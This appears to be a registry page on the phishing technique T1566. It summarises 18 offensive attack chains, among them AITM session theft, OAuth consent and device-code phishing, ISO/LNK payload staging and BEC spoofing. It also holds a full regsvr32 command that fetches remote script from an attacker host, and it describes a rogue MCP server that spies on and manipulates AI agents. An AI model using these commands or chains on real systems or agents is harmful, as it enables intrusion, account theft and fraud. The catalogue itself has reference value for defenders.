Phishing
Send malicious messages to obtain access.
§ Where this technique fits
T1566 is catalogued under the Initial Access tactic of the offensive-security kill-chain. It appears in 18 approved dossiers in the registry, at step 2.7 on average.
Authoritative reference: attack.mitre.org/techniques/T1566/.
§ Dossiers chaining this technique
- step 1 / 7: V8 type-confusion 1-day → renderer RCE
  Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.
- step 1 / 6: OneNote .one attachment → embedded payload → C2
  OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.
- step 1 / 6: ISO container → LNK → stage from CDN → C2
  Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.
- step 1 / 6: Rowhammer → bit flip → in-browser sandbox escape
  JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.
- step 2 / 6: Malicious MCP server → silent supply chain for agent tools
  User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- step 2 / 6: FIDO2 caBLE hybrid → phone authenticator hijack
  Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- step 2 / 5: Squiblydoo: regsvr32 → remote SCT execution
  regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- step 2 / 6: OAuth device-code phishing → M365 access without a fake page
  Initiate a device-code flow against login.microsoftonline.com; send the code + url to the victim via email or chat. Once they enter it, attacker gets access + refresh tokens.
- step 2 / 6: Browser-in-the-Browser → credential theft on a trusted page
  Render a fake SSO popup inside the attacker page that looks like a real OS browser window. Victim types their credentials into the attacker's DOM.
- step 2 / 7: AITM phishing (Evilginx) → M365 session theft → mailbox exfil
  Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.
- step 3 / 6: DNS rebinding → access internal router admin from a browser
  Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.
- step 3 / 5: Gatekeeper bypass → unsigned binary execution
  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.
- step 3 / 6: Entra app consent phishing → Global Admin equivalent
  Phish a privileged user to consent to an OAuth app requesting Directory.ReadWrite.All + RoleManagement.ReadWrite.Directory — the app then grants itself Global Administrator.
- step 4 / 6: Compromised vendor mailbox → reply-chain phishing → client compromise
  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- step 4 / 6: Header smuggling → gateway sees vendor, mailbox sees attacker
  Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.
- step 4 / 6: Deeplink abuse → in-app account takeover
  Exported activity registers a custom URL scheme that triggers an OAuth-style 'confirm reset' action without validating the source — phishing URL clicks reset another user's password.
- step 5 / 8: OAuth redirect_uri misconfig → account takeover
  Provider accepts loose redirect_uri matching (wildcard, partial, open-redirect chain). Steal the authorization code by redirecting it through an attacker host.
- step 6 / 7: Permissive SPF / DMARC p=none → CEO impersonation BEC
  Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.
§ What commonly comes next
- 01 User Execution · seen 7× · T1204 · Execution
- 02 Business Email Compromise: Invoice Fraud · seen 1× · SE-BEC-INVOICE · Impact
- 03 DNS Rebinding · seen 1× · DNS-REBINDING · Lateral Movement
- 04 Entra App Consent Phishing · seen 1× · C-AZ-APP-CONSENT · Privilege Escalation
- 05 FIDO2 caBLE / Hybrid Transport Abuse · seen 1× · AUTH-FIDO2-CABLE · Credential Access
- 06 ISO / IMG Mounting → LNK Execution · seen 1× · PAY-ISO-LNK · Execution
- 07 Insecure Direct Object Reference (IDOR) · seen 1× · W-IDOR · Privilege Escalation
- 08 MFA Fatigue / Prompt Bombing · seen 1× · PH-MFA-FATIGUE · Initial Access